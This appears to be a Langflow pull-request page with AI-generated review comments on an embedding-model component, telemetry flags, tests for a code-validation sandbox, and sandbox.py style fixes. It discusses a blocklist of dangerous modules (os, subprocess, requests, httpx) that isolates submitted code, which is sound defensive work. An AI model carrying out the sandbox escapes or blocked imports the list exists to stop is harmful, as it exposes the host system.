langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | |
| }, | |
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" |
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.
| "input_text": { | ||
| "_input_type": "BoolInput", | ||
| "advanced": true, | ||
| "display_name": "Include the original text in the output", | ||
| "dynamic": false, | ||
| "info": "", | ||
| "list": false, | ||
| "list_add_label": "Add More", | ||
| "name": "input_text", | ||
| "placeholder": "", | ||
| "required": false, | ||
| "show": false, | ||
| "title_case": false, | ||
| "tool_mode": false, | ||
| "trace_as_metadata": true, | ||
| "track_in_telemetry": true, | ||
| "type": "bool", | ||
| "value": true | ||
| }, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Telemetry/privacy check for input_text flag.
The field tracks as telemetry. Ensure only the boolean is captured (no raw text) and that analytics pipelines don’t infer content from it. If uncertain, disable tracking.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.
| response = await client.post( | ||
| "api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers | ||
| ) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Code executes but in isolation - sys is imported fresh, not server's sys | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_safe_code(client: AsyncClient, logged_in_headers): | ||
| """Test that legitimate safe code still works.""" | ||
| safe_code = """ | ||
| from typing import List, Optional | ||
| def process(items: List[str]) -> Optional[str]: | ||
| return items[0] if items else None | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should have no errors for safe code | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 | ||
|
|
||
|
|
||
| # Isolation verification tests | ||
| # | ||
| # IMPORTANT: These tests verify that the validate endpoint uses the sandbox. | ||
| # The actual isolation behavior is tested in src/lfx/tests/unit/custom/test_sandbox_isolation.py | ||
| # These tests just verify that dangerous code executes without crashing (proves sandbox is used) | ||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_safe_imports(client: AsyncClient, logged_in_headers): | ||
| """Test that safe imports are allowed.""" | ||
| # Code with safe imports should work | ||
| safe_code = """ | ||
| from typing import List, Optional | ||
| import json | ||
| import math | ||
| def test(items: List[str]) -> Optional[str]: | ||
| return json.dumps({"count": math.sqrt(len(items))}) | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should execute without errors - safe imports are allowed | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers): | ||
| """Test that third-party libraries (not in a whitelist) can be imported. | ||
| Users should be able to import legitimate third-party libraries like AI libraries, | ||
| data processing libraries, etc. We only block dangerous system-level modules. | ||
| """ | ||
| # Try importing a common third-party library that wouldn't be in a whitelist | ||
| # Using 'requests' as an example - it's a legitimate library but not dangerous | ||
| # Note: This test will fail if 'requests' isn't installed, but that's okay | ||
| # The important thing is that if it IS installed, it should be allowed | ||
| third_party_code = """ | ||
| try: | ||
| import requests | ||
| HAS_REQUESTS = True | ||
| except ImportError: | ||
| HAS_REQUESTS = False | ||
| def test(): | ||
| return HAS_REQUESTS | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should execute without errors - third-party libraries are allowed | ||
| # (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.) | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Fix unused result and align third‑party import expectations with sandbox blocklist
-
In
test_validate_code_cannot_access_server_globals(Line 139),result = response.json()is never used, which triggers Ruff F841. Either drop the assignment or assert on the returned payload (for example, that"sys"or"blocked"appears in the combinedimports/functionerrors to confirm the sandbox blocked the module). -
In
test_validate_code_allows_third_party_libraries, the test asserts that importingrequestsnever produces errors, but the sandbox’sBLOCKED_MODULEScurrently includes"requests"and"httpx"as dangerous network modules. With that configuration,create_isolated_import("requests", ...)will raise aSecurityViolation, andvalidate_codewill populateimports["errors"], causing this test to fail.
You’ll want to either:
- Treat network libraries as allowed during validation (remove
requests/httpxfromBLOCKED_MODULES), or - Relax this test to something like “if
requestsis installed and not blocklisted, the import should succeed”, or gate it withpytest.importorskip("requests")and adjust expectations based on the sandbox policy.
Right now, the test’s assertion that “third‑party libraries are allowed” conflicts with the current sandbox blocklist.
🏁 Script executed:
#!/bin/bash
# Confirm BLOCKED_MODULES contents and observe validate-code behavior for `requests`.
python - << 'PY'
from lfx.custom.sandbox import BLOCKED_MODULES
print("BLOCKED_MODULES:", sorted(BLOCKED_MODULES))
from lfx.custom.validate import validate_code
code = "import requests\n"
print("validate_code result:", validate_code(code))
PYLength of output: 115
The web search results provide general information about Python sandbox patterns, but not the specific codebase. Let me inspect the actual source files directly using shell commands.
---
🏁 Script executed:
```shell
#!/bin/bash
# Find and inspect the sandbox and validate modules
find . -type f -name "*.py" | grep -E "(sandbox|validate)" | head -20
Length of output: 610
🏁 Script executed:
#!/bin/bash
# Search for BLOCKED_MODULES and validate_code in the repo
fd -e py -x rg -l "BLOCKED_MODULES|validate_code" {} \; | head -20Length of output: 484
---
🏁 Script executed:
```shell
#!/bin/bash
# Read BLOCKED_MODULES from sandbox.py
cat ./src/lfx/src/lfx/custom/sandbox.py | head -100
Length of output: 2782
🏁 Script executed:
#!/bin/bash
# Read validate_code function from lfx validate.py
cat ./src/lfx/src/lfx/custom/validate.pyLength of output: 18706
🏁 Script executed:
#!/bin/bash
# Read the test file around line 139 and the full test functions in question
sed -n '136,220p' ./src/backend/tests/unit/api/v1/test_validate.pyLength of output: 3605
---
🏁 Script executed:
```shell
#!/bin/bash
# Read create_isolated_import function from sandbox.py
cat ./src/lfx/src/lfx/custom/sandbox.py | grep -A 30 "def create_isolated_import"
Length of output: 1546
🏁 Script executed:
#!/bin/bash
# Search for any runtime modification of BLOCKED_MODULES
rg -n "BLOCKED_MODULES\s*=" ./src/lfx/src/lfx/custom/sandbox.py
rg -n "BLOCKED_MODULES\." ./src/lfx/src/lfx/custom/ -A 2 -B 2Length of output: 0
🏁 Script executed:
#!/bin/bash
# Check if there are any fixture or setup functions that modify sandbox behavior in tests
sed -n '1,150p' ./src/backend/tests/unit/api/v1/test_validate.py | head -80Length of output: 2882
Fix unused result variable and address test failure due to blocked requests module
Two issues confirmed:
-
Line 139 — Unused variable (Ruff F841):
result = response.json()is assigned but never used. Either remove the assignment or assert on it (e.g., to confirm the sandbox blocked the module). -
test_validate_code_allows_third_party_libraries(lines 199–213) — Test will fail: The test importsrequestsand expectslen(result["imports"]["errors"]) == 0, butrequestsis explicitly inBLOCKED_MODULESas a dangerous network module. Whenisolated_importtries to loadrequests, it raisesSecurityViolation, whichvalidate_codecatches and appends to the errors list. The assertion will fail.
Choose one approach:
- Remove
requestsandhttpxfromBLOCKED_MODULESif network access should be allowed during validation, or - Rewrite the test to skip the assertion if the module is blocked, or gate it with
pytest.importorskip("requests")and adjust expectations based on your sandbox policy.
🧰 Tools
🪛 GitHub Actions: Ruff Style Check
[error] 139-139: F841 Local variable result is assigned to but never used.
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used
🤖 Prompt for AI Agents
In src/backend/tests/unit/api/v1/test_validate.py around lines 136–213, fix two
issues: at ~line 139 remove the unused assignment `result = response.json()` (or
replace it with an assertion using `result` if you intended to validate response
content); and for the third-party import test (lines ~199–213) change the test
to handle the sandbox policy: use pytest.importorskip("requests") to skip the
test when requests is not available, or update the assertions to accept both
outcomes (if the sandbox blocks network modules then expect an imports error,
otherwise expect zero import errors) so the test reflects whether `requests` is
allowed by BLOCKED_MODULES.
| class SecurityViolation(Exception): | ||
| """Raised when code attempts to escape the sandbox or use blocked operations.""" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Address Ruff violations: exception naming, long messages, and simple try/except
Ruff is flagging several style issues here:
-
Line 17:
SecurityViolationviolates N818 (exception names should end withError). Either rename the class (e.g.,SecurityViolationError) or add a local suppression likeclass SecurityViolation(Exception): # noqa: N818if you prefer the current name. -
Lines 105–108: The
try/except AttributeError: passaroundgetattr(builtins, name)can be simplified usingcontextlib.suppress(AttributeError):
-import builtins
+import builtins
+import contextlib
@@
- for name in dir(builtins):
- if not name.startswith("_"):
- # Block dangerous builtins unless explicitly allowed
- if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
- continue
- try:
- isolated_builtins[name] = getattr(builtins, name)
- except AttributeError:
- pass
+ for name in dir(builtins):
+ if not name.startswith("_"):
+ if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+ continue
+ with contextlib.suppress(AttributeError):
+ isolated_builtins[name] = getattr(builtins, name)- Lines ~128–130 and ~160–162: Raising
SecurityViolationwith long f-strings trips EM102/TRY003/E501. Factor the message into a variable and pass it to the exception:
- if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
- raise SecurityViolation(
- f"Dangerous builtin '{name}' is blocked. "
- f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
- )
+ if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+ msg = (
+ f"Dangerous builtin '{name}' is blocked. "
+ "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+ )
+ raise SecurityViolation(msg)
@@
- if module_name in BLOCKED_MODULES:
- raise SecurityViolation(
- f"Dangerous module '{module_name}' is blocked. "
- f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
- )
+ if module_name in BLOCKED_MODULES:
+ msg = (
+ f"Dangerous module '{module_name}' is blocked. "
+ "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+ )
+ raise SecurityViolation(msg)These changes should clear the current Ruff complaints without altering sandbox behavior.
Also applies to: 96-139, 152-163
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/sandbox.py around lines 17-18, 96-139, 152-163, update
exception naming and simplify/clean up try/except and long exception messages:
rename SecurityViolation to SecurityViolationError (or add a local noqa: N818
comment) to satisfy N818; replace try/except AttributeError blocks around
getattr(builtins, name) with contextlib.suppress(AttributeError) to simplify
control flow; and refactor any long f-string messages used in raise
SecurityViolation(...) into a separately assigned message variable (message =
f"...") and then raise the exception with that variable (raise
SecurityViolationError(message)) to avoid EM102/TRY003/E501 style violations.
